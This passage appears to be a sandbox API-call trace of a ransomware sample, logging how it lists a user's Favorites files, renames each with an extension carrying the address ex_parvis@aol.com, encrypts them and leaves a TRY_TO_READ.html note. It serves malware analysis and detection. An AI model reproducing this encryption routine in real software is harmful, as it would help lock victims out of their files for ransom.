	[0106.497] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.497] ReadFile (in: hFile=0x534, lpBuffer=0x574418, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.497] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.497] WriteFile (in: hFile=0x534, lpBuffer=0x56b300*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b300*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.497] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.497] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.497] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 1
	[0106.498] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 67
	[0106.498] GetProcessHeap () returned 0x540000
	[0106.498] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x598b60
	[0106.498] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url"
	[0106.498] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.498] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.500] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534
	[0106.500] GetProcessHeap () returned 0x540000
	[0106.501] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.501] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.501] SetFilePointer (in: hFile=0x534, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.501] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.501] GetProcessHeap () returned 0x540000
	[0106.501] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.501] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.501] WriteFile (in: hFile=0x534, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.502] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.503] WriteFile (in: hFile=0x534, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.503] ReadFile (in: hFile=0x534, lpBuffer=0x56b300, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b300*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.503] SetFilePointer (in: hFile=0x534, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.503] WriteFile (in: hFile=0x534, lpBuffer=0x598b60*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598b60*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.503] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dafb0
	[0106.503] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.503] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1
	[0106.503] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6520070, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.503] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1
	[0106.503] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1
	[0106.504] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1
	[0106.504] FindNextFileW (in: hFindFile=0x5dafb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0
	[0106.504] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.504] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.504] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x80) returned 1
	[0106.505] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 77
	[0106.505] GetProcessHeap () returned 0x540000
	[0106.505] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8670
	[0106.505] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url"
	[0106.505] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.505] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.507] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538
	[0106.507] GetProcessHeap () returned 0x540000
	[0106.507] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.508] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.508] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.508] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.508] GetProcessHeap () returned 0x540000
	[0106.508] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.508] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.508] WriteFile (in: hFile=0x538, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.509] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.509] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.509] ReadFile (in: hFile=0x538, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.509] SetFilePointer (in: hFile=0x538, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.510] WriteFile (in: hFile=0x538, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.510] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.510] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.510] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x80) returned 1
	[0106.511] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 75
	[0106.511] GetProcessHeap () returned 0x540000
	[0106.511] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0106.511] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url"
	[0106.511] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.511] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.514] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538
	[0106.514] GetProcessHeap () returned 0x540000
	[0106.514] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.514] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.514] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.514] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.514] GetProcessHeap () returned 0x540000
	[0106.514] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.514] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.514] WriteFile (in: hFile=0x538, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.515] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.516] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.516] ReadFile (in: hFile=0x538, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.516] SetFilePointer (in: hFile=0x538, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.516] WriteFile (in: hFile=0x538, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.516] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.516] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.516] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x80) returned 1
	[0106.516] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 78
	[0106.517] GetProcessHeap () returned 0x540000
	[0106.517] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0106.517] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url"
	[0106.517] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.517] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.519] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538
	[0106.519] GetProcessHeap () returned 0x540000
	[0106.519] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.519] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.520] SetFilePointer (in: hFile=0x538, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.520] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.520] GetProcessHeap () returned 0x540000
	[0106.520] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.520] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.520] WriteFile (in: hFile=0x538, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.521] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.521] WriteFile (in: hFile=0x538, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.521] ReadFile (in: hFile=0x538, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.521] SetFilePointer (in: hFile=0x538, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.521] WriteFile (in: hFile=0x538, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.522] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.522] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
